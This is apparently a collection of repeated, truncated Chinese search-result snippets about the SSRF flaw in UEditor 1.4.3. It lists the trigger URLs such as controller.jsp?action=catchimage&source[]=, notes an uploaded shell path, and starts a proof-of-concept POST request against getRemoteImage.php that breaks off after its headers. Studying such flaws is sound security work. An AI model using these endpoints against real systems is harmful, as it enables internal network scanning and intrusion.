前些时间测试的时候遇到了一个系统采用了UEditor编辑器,版本为1.4.3。已知该编辑器v1.4.3版本存在SSRF漏洞,虽然是Bool型的SSRF,除了可以进行内网探测外,也可以根据web应用指纹信息,之后进行进一步的测试。 0x01前言 查看官方的更新日志可以发现UEditor编辑器在版本1.4.3.1修复了SSRF漏洞。 0x02漏洞分析 那我们需要查看...
Ueditor 漏洞复现&分析 0x00 前言 复现学习 0x01 漏洞复现 环境搭建参考这篇blog,主要是在ueditor主目录创建WEB-INF/lib,并将jar包移到该lib下,启动tomcat服务器。 请求内网服务器地址 0x02 漏洞原理 该ssrf属于过滤规则不严谨导致可以任意请求内网地址。 先看看controller.jsp,请求进来时,调用 ActionEnter.exec进行...
shell路径由CONFIG[imagePathFormat]=ueditor/php/upload/fuck决定http://localhost/ueditor/php/upload/fuck.php 四、SSRF漏洞 该漏洞存在于1.4.3的jsp版本中。但1.4.3.1版本已经修复了该漏洞。 SSRF 已知该版本ueditor的ssrf触发点: /jsp/controller.jsp?action=catchimage&source[]= /jsp/getRemoteImage.jsp?upfi...
shell路径由CONFIG[imagePathFormat]=ueditor/php/upload/fuck决定[http://localhost/ueditor/php/upload/fuck.php 四、SSRF漏洞 该漏洞存在于1.4.3的jsp版本中。但1.4.3.1版本已经修复了该漏洞。 SSRF 已知该版本ueditor的ssrf触发点: /jsp/controller.jsp?action=catchimage&source[]= /jsp/getRemoteImage.jsp?up...
四、SSRF漏洞 该漏洞存在于1.4.3的jsp版本中。但1.4.3.1版本已经修复了该漏洞。 SSRF 已知该版本ueditor的ssrf触发点: /jsp/controller.jsp?action=catchimage&source[]= /jsp/getRemoteImage.jsp?upfile= /php/controller.php?action=catchimage&source[]= ...
还有一个版本的ssrf漏洞 ,存在于onethink 1.0中的ueditor,测试版本为1.2直接贴Poc: POST http://target/Public/static/ueditor/php/getRemoteImage.php HTTP/1.1Host: targetUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101Firefox/55.0Accept: text/html,application/xhtml xml,applicati...
还有一个版本的ssrf漏洞 ,存在于onethink 1.0中的ueditor,测试版本为1.2直接贴Poc: POSThttp://target/Public/static/ueditor/php/getRemoteImage.phpHTTP/1.1Host: targetUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101Firefox/55.0Accept: text/html,application/xhtml+xml,application...
还有一个版本的ssrf漏洞 ,存在于onethink 1.0中的ueditor,测试版本为1.2直接贴Poc POST http://target/Public/static/ueditor/php/getRemoteImage.php HTTP/1.1 Host: target User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,app...
前些时间测试的时候遇到了一个系统采用了UEditor编辑器,版本为1.4.3。已知该编辑器v1.4.3版本(jsp)存在SSRF漏洞,虽然是Bool型的SSRF,除了可以进行内网探测外,也可以根据web应用指纹信息,之后进行进一步的测试。 0x01 前言 查看官方的更新日志可以发现UEditor编辑器在版本1.4.3.1修复了SSRF漏洞。